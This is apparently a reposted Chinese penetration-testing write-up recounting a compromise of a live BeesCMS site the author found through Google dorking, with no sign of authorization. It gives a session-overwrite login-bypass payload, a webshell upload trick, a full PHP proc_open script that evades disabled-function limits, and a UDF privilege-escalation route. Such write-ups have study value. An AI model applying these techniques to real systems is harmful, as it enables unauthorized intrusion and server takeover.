安全模式 提权_记一次渗透挖洞提权实战

摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。


0x01 进入后台

在通过googlehack语法挖掘beescms时发现了这个站点fb30c526e397c1f4bf66e900d318a8c5.png
利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后访问/admin便可以直接进入后台

0x02 拿shell

进入后台后在‘添加产品模块’处寻找到了上传点

2b47447ba67fa4ac882b1c067a8e7f9c.png

尝试上马,但提示‘上传图片格式不正确’,于是上传图片马抓包,在repeater里更改后缀为php,然后go

a6e9a6ddae02a705751a64f109ce026b.png

根据回显没有看出是否上传成功,但也没说失败。经过寻找在‘上传图片管理’处找到

fc5532ab9d629cd03a80ff5810a70c11.png

点击图片发现解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却发现执行命令失败,可能远程启用了安全模式

22bea898130b24a14eb097b0aae31aa8.png

经过在网上一番查找得出:要找到未禁用的php执行函数。先上传了一个查看phpinfo的脚本,找到已禁用的函数

be0800ca154ee9d473993fa56e655612.png

发现proc_open函数未被禁用,于是找到如下php脚本

<?php $descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符0=>array('pipe','r'), //STDIN1=>array('pipe','w'),//STDOUT2=>array('pipe','w') //STDERROR);$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);//$pipes中保存的是子进程创建的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)if(!is_resource($handle)){die('proc_open failed');}//fwrite($pipes[0],'ipconfig');print('stdout:
');while($s=fgets($pipes[1])){print_r($s);}print('===========
stderr:
');while($s=fgets($pipes[2])){print_r($s);}fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($handle);?>

上传后可以执行命令,成功绕过安全模式

344aec16dc59188e9db2fd4dc5622b28.png

0x04 提权

上图可以看出只是iis权限,能做的事很局限,所以要想办法提权。
菜刀中虽然不能执行命令,但是可以查看文件,于是找到了数据库配置文件

80cbaf5eb46552412189ef28c8af70ed.png

发现是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

461cefb5be3075f0613bcc8333128c8d.png

登录后导出udf便可以执行命令了

71ca7af6601ffffdc6f163306e13974d.png

提权成功,但是不可以添加用户,也不能开3389。


结语:希望路过的各位大佬可以指点迷津,也欢迎各位来找我交流探讨,感谢阅读。

参考链接:

PHP限制命令执行绕过https://www.cnblogs.com/R4v3n/articles/9081202.html 

d565c21a1239d4c6156354b9d1f8ca84.png

作者: PaperPen 

来源:先知社区

如有侵权,请联系删除

c3d3ec259535f9a995b1cbb848665aef.gif

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值